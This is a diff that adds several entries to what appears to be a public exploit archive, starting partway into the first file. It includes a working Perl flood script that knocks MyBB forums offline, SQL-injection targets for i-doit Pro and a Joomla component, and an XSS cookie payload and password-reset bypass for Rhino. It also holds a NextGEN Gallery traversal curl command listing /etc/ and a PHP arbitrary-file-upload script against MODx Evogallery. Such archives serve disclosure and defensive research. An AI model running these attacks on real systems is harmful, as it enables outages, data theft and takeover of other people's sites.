+MyBB 1.6.12 is vulnerable; other versions may be also be affected. 
+
+
+
+# Mybb All Version Denial of Service Vulnerability
+
+#!/usr/bin/perl
+
+# Iranian Exploit DataBase
+# Mybb All Version Denial of Service Vulnerability
+# Test on Mybb 1.6.12
+# Vendor site : www.mybb.com
+# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () 
+yahoo com
+# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir
+# Fb Page : https://www.facebook.com/iedb.ir
+# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR  - F () riD - N20 - 
+Bl4ck N3T - 0x0ptim0us - 0Day
+# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - 
+z3r0 - Mr.Zer0 - one alone hacker
+# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam 
+Vanda - C0dex - Dj.TiniVini
+# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
+#####################################
+use Socket;
+if (@ARGV < 2) { &usage }
+$rand=rand(10);
+$host = $ARGV[0];
+$dir = $ARGV[1];
+$host =~ s/(http:\/\/)//eg;
+for ($i=0; $i<10; $i--)
+{
+$data = 
+"forums%5B%5D=all&version=rss2.0&limit=1500000&make=%D8%AF%D8%B1%DB%8C%D8%A7%D9%81%D8%AA+%D9%84%DB%8C%D9%86%DA%A9+%D9%BE%DB%8C%D9%88%D9%86%D8%AF+%D8%B3%D8%A7%DB%8C%D8%AA%DB%8C";
+$len = length $data;
+$foo = "POST ".$dir."misc.php?action=syndication HTTP/1.1\r\n".
+"Accept: * /*\r\n".
+"Accept-Language: en-gb\r\n".
+"Content-Type: application/x-www-form-urlencoded\r\n".
+"Accept-Encoding: gzip, deflate\r\n".
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
+"Host: $host\r\n".
+"Content-Length: $len\r\n".
+"Connection: Keep-Alive\r\n".
+"Cache-Control: no-cache\r\n\r\n".
+"$data";
+my $port = "80";
+my $proto = getprotobyname('tcp');
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
+connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
+send(SOCKET,"$foo", 0);
+syswrite STDOUT, "+" ;
+}
+print "\n\n";
+system('ping $host');
+sub usage {
+print "################################################# \n";
+print "##       Mybb All Version Denial of Service Vulnerability\n";
+print "## Discoverd By Amir - iedb.team () gmail com - Id : 
+o0_shabgard_0o \n";
+print "##      Www.IeDb.Ir/acc   -   Www.IrIsT.Ir \n";
+print "################################################# \n";
+print "## [host] [path] \n";
+print "## http://host.com /mybb/\n";
+print "################################################# \n";
+exit();
+};
+#####################################
+#  Archive Exploit = http://www.iedb.ir/exploits-1332.html
+#####################################
+
+###########################
+
+# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-12]
+
+###########################
diff --git a/platforms/php/webapps/39096.txt b/platforms/php/webapps/39096.txt
new file mode 100755
index 000000000..2c87e7fbf
--- /dev/null
+++ b/platforms/php/webapps/39096.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65557/info
+
+i-doit Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+i-doit Pro 1.2.4 and prior are vulnerable. 
+
+http://www.example.com/?objID=[SQL Injection] 
diff --git a/platforms/php/webapps/39098.txt b/platforms/php/webapps/39098.txt
new file mode 100755
index 000000000..cbfaec540
--- /dev/null
+++ b/platforms/php/webapps/39098.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/65606/info
+
+Wire Immogest component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_wire_immogest&view=object&id=[SQL Injection] 
\ No newline at end of file
diff --git a/platforms/php/webapps/39099.txt b/platforms/php/webapps/39099.txt
new file mode 100755
index 000000000..c9773a5ae
--- /dev/null
+++ b/platforms/php/webapps/39099.txt
@@ -0,0 +1,79 @@
+source: http://www.securityfocus.com/bid/65628/info
+
+Rhino is prone to a cross-site scripting vulnerability and security-bypass vulnerability .
+
+An attacker can exploit these issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, bypass security restrictions to obtain sensitive information, or perform unauthorized actions. Other attacks may also be possible.
+
+Rhino 4.1 is vulnerable; other versions may also be affected. 
+
+==========================
+PoC-Exploit
+==========================
+
+// Non-Persistent XSS  with "callback" Parameter in
+/include/proactive_cross.php
+
+(1) Under "callback" set your GET Parameter Callback to
+"><script>alert(document.cookie)</script>
+
+The Non-Persistent XSS will be executed for the Administrator in the
+browser (he directly logged in because you chatting with him)
+
+// Remote Change Password - with "Forgot.php"
+
+http://[target]/rhino/operator/index.php?p=forgot
+
+(1) in the forgot file there's no condition if the user logged in or not,
+so we can look deeply in the file in line (27-67)
+
+if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['newP'])) {
+    $defaults = $_POST;
+
+    $femail = filter_var($_POST['f_email'], FILTER_SANITIZE_EMAIL);
+    $pass = $_POST['f_pass'];
+    $newpass = $_POST['f_newpass'];
+
+    if ($pass != $newpass) {
+        $errors['e1'] = $tl['error']['e10'];
+    } elseif (strlen($pass) <= '5') {
+        $errors['e1'] = $tl['error']['e11'];
+    }
+
+    if ($defaults['f_email'] == '' || !filter_var($defaults['f_email'],
+FILTER_VALIDATE_EMAIL)) {
+        $errors['e'] = $tl['error']['e3'];
+    }
+
+    $fwhen = 0;
+
+    $user_check = $lsuserlogin->lsForgotpassword($femail, $fwhen);
+    if ($user_check == true && count($errors) == 0) {
+
+    // The new password encrypt with hash_hmac
+    $passcrypt = hash_hmac('sha256', $pass, DB_PASS_HASH);
+
+    $result2 = $lsdb->query('UPDATE '.DB_PREFIX.'user SET password =
+"'.$passcrypt.'", forgot = 0 WHERE email = "'.smartsql($femail).'"');
+
+    $result = $lsdb->query('SELECT username FROM '.DB_PREFIX.'user WHERE
+email = "'.smartsql($femail).'" LIMIT 1');
+    $row = $result->fetch_assoc();
+
+    if (!$result) {
+        ls_redirect(JAK_PARSE_ERROR);
+    } else {
+        $lsuserlogin->lsLogin($row['username'], $pass, 0);
+        ls_redirect(BASE_URL);
+    }
+
+    } else {
+        $errorsf = $errors;
+    }
+}
+
+So there is an MySQL Query to execute if the email in the database (Show up
+the change password settings).
+
+ALL YOU HAVE TO DO IS DISCOVER THE E-MAIL ADDRESS THAT PUTTED WHEN ADMIN
+INSTALLED THE SCRIPT.
+
diff --git a/platforms/php/webapps/39100.txt b/platforms/php/webapps/39100.txt
new file mode 100755
index 000000000..5e5e5285e
--- /dev/null
+++ b/platforms/php/webapps/39100.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65637/info
+
+The NextGEN Gallery plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
+
+NextGEN Gallery 2.0.0 is vulnerable; other versions may also be affected. 
+
+curl -i -d 'dir=/etc/' http://www.example.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php 
\ No newline at end of file
diff --git a/platforms/php/webapps/39101.php b/platforms/php/webapps/39101.php
new file mode 100755
index 000000000..2e9f0785d
--- /dev/null
+++ b/platforms/php/webapps/39101.php
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/65646/info
+
+MODx Evogallery module is prone to an arbitrary file upload vulnerability.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+<?php
+$uploadfile="file.php"; 
+$ch = curl_init("demo.ltd/assets/modules/evogallery/js/uploadify/uploadify.php");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS,       
+array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>